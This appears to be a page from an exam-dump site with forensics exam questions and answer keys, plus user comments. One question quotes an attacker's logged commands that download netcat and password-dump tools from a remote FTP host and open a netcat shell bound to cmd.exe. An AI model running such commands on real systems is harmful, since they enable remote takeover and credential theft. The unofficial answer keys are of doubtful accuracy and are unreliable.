Amazon
Avaya
Cisco
CompTIA
CrowdStrike
EC-Council
EXIN
Fortinet
Google
ISC
ISC2
ITIL
Juniper
Microsoft
NVIDIA
Okta
Palo Alto Networks
Salesforce
SAP
ServiceNow
All Vendors

EC-Council Computer Hacking Forensic Investigator 312-49 Dumps in PDF

Free EC-Council 312-49 Real Questions (page: 8)

312-49 PDF — 704 Questions

When investigating a potential e-mail crime, what is your first step in the investigation?

  1. Trace the IP address to its origin
  2. Write a report
  3. Determine whether a crime was actually committed
  4. Recover the evidence

Answer(s): A



If a suspect computer is located in an area that may have toxic chemicals, you must:

  1. coordinate with the HAZMAT team
  2. determine a way to obtain the suspect computer
  3. assume the suspect machine is contaminated
  4. do not enter alone

Answer(s): A



The following excerpt is taken from a honeypot log. The log captures activities across three days. There are several intrusion attempts; however, a few are successful.
(Note: The objective of this question is to test whether the student can read basic information from log entries and interpret the nature of attack.)

Apr 24 14:46:46 [4663]: spp_portscan: portscan detected from 194.222.156.169
Apr 24 14:46:46 [4663]: IDS27/FIN Scan: 194.222.156.169:56693 -> 172.16.1.107:482
Apr 24 18:01:05 [4663]: IDS/DNS-version-query: 212.244.97.121:3485 -> 172.16.1.107:53
Apr 24 19:04:01 [4663]: IDS213/ftp-passwd-retrieval: 194.222.156.169:1425 -> 172.16.1.107:21
Apr 25 08:02:41 [5875]: spp_portscan: PORTSCAN DETECTED from 24.9.255.53
Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4499 -> 172.16.1.107:53
Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4630 -> 172.16.1.101:53
Apr 25 02:38:17 [5875]: IDS/RPC-rpcinfo-query: 212.251.1.94:642 -> 172.16.1.107:111
Apr 25 19:37:32 [5875]: IDS230/web-cgi-space-wildcard: 198.173.35.164:4221 -> 172.16.1.107:80
Apr 26 05:45:12 [6283]: IDS212/dns-zone-transfer: 38.31.107.87:2291 -> 172.16.1.101:53
Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53
Apr 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user simple by (uid=0)
Apr 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user simon by simple(uid=506)
Apr 26 06:45:34 [6283]: IDS175/socks-probe: 24.112.167.35:20 -> 172.16.1.107:1080
Apr 26 06:52:10 [6283]: IDS127/telnet-login-incorrect: 172.16.1.107:23 -> 213.28.22.189:4558

From the options given below choose the one which best interprets the following entry: Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53

  1. An IDS evasion technique
  2. A buffer overflow attempt
  3. A DNS zone transfer
  4. Data being retrieved from 63.226.81.13

Answer(s): A



What happens when a file is deleted by a Microsoft operating system using the FAT file system?

  1. only the reference to the file is removed from the FAT
  2. the file is erased and cannot be recovered
  3. a copy of the file is stored and the original file is erased
  4. the file is erased but can be recovered

Answer(s): A



The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.
He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below.

"cmd1.exe /c open 213.116.251.162 >ftpcom"
"cmd1.exe /c echo johna2k >>ftpcom"
"cmd1.exe /c echo haxedj00 >>ftpcom"
"cmd1.exe /c echo get nc.exe >>ftpcom"
"cmd1.exe /c echo get pdump.exe >>ftpcom"
"cmd1.exe /c echo get samdump.dll >>ftpcom"
"cmd1.exe /c echo quit >>ftpcom"
"cmd1.exe /c ftp -s:ftpcom"
"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"

What can you infer from the exploit given?

  1. It is a local exploit where the attacker logs in using username johna2k
  2. There are two attackers on the system - johna2k and haxedj00
  3. The attack is a remote exploit and the hacker downloads three files
  4. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port

Answer(s): C

Explanation:

The log clearly indicates that this is a remote exploit with three files being downloaded and hence the correct answer is C.



PDF
Viewing page 8 of 108

Share your comments for EC-Council 312-49 exam with other users:

F
Freddie
12/12/2023 12:37:00 PM

helpful dump questions

SOUTH AFRICA
D
Da Costa
8/25/2023 7:30:00 AM

question 423 eigrp uses metric

Anonymous
B
Bsmaind
8/20/2023 9:22:00 AM

hello nice dumps

Anonymous
B
beau
1/12/2024 4:53:00 PM

good resource for learning

UNITED STATES
S
Sandeep
12/29/2023 4:07:00 AM

very useful

Anonymous
K
kevin
9/29/2023 8:04:00 AM

physical tempering techniques

Anonymous
B
Blessious Phiri
8/15/2023 4:08:00 PM

its giving best technical knowledge

Anonymous
T
Testbear
6/13/2023 11:15:00 AM

please upload

ITALY
S
shime
10/24/2023 4:23:00 AM

great question with explanation thanks!!

ETHIOPIA
T
Thembelani
5/30/2023 2:40:00 AM

does this exam have lab sections?

Anonymous
S
Shin
9/8/2023 5:31:00 AM

please upload

PHILIPPINES
P
priti kagwade
7/22/2023 5:17:00 AM

please upload the braindump for .net

UNITED STATES
R
Robe
9/27/2023 8:15:00 PM

i need this exam 1z0-1107-2. please.

Anonymous
C
Chiranthaka
9/20/2023 11:22:00 AM

very useful!

Anonymous
N
Not Miguel
11/26/2023 9:43:00 PM

for this question - "which three type of basic patient or member information is displayed on the patient info component? (choose three.)", list of conditions is not displayed (it is displayed in patient card, not patient info). so should be thumbnail of chatter photo

Anonymous
A
Andrus
12/17/2023 12:09:00 PM

q52 should be d. vm storage controller bandwidth represents the amount of data (in terms of bandwidth) that a vms storage controller is using to read and write data to the storage fabric.

Anonymous
R
Raj
5/25/2023 8:43:00 AM

nice questions

UNITED STATES
M
max
12/22/2023 3:45:00 PM

very useful

Anonymous
M
Muhammad Rawish Siddiqui
12/8/2023 6:12:00 PM

question # 208: failure logs is not an example of operational metadata.

SAUDI ARABIA
S
Sachin Bedi
1/5/2024 4:47:00 AM

good questions

Anonymous
K
Kenneth
12/8/2023 7:34:00 AM

thank you for the test materials!

KOREA REPUBLIC OF
H
Harjinder Singh
8/9/2023 4:16:00 AM

its very helpful

HONG KONG
S
SD
7/13/2023 12:56:00 AM

good questions

UNITED STATES
K
kanjoe
7/2/2023 11:40:00 AM

good questons

UNITED STATES
M
Mahmoud
7/6/2023 4:24:00 AM

i need the dumb of the hcip security v4.0 exam

EGYPT
W
Wei
8/3/2023 4:18:00 AM

upload the dump please

HONG KONG
S
Stephen
10/3/2023 6:24:00 PM

yes, iam looking this

AUSTRALIA
S
Stephen
8/4/2023 9:08:00 PM

please upload cima e2 managing performance dumps

Anonymous
H
hp
6/16/2023 12:44:00 AM

wonderful questions

Anonymous
P
Priyo
11/14/2023 2:23:00 AM

i used this site since 2000, still great to support my career

INDONESIA
J
Jude
8/29/2023 1:56:00 PM

why is the answer to "which of the following is required by scrum?" all of the following stated below since most of them are not mandatory? sprint retrospective. members must be stand up at the daily scrum. sprint burndown chart. release planning.

UNITED STATES
M
Marc blue
9/15/2023 4:11:00 AM

great job. hope this helps out.

UNITED STATES
A
Anne
9/13/2023 2:33:00 AM

upload please. many thanks!

Anonymous
P
pepe el toro
9/12/2023 7:55:00 PM

this is so interesting

Anonymous
AI Tutor 👋 I’m here to help!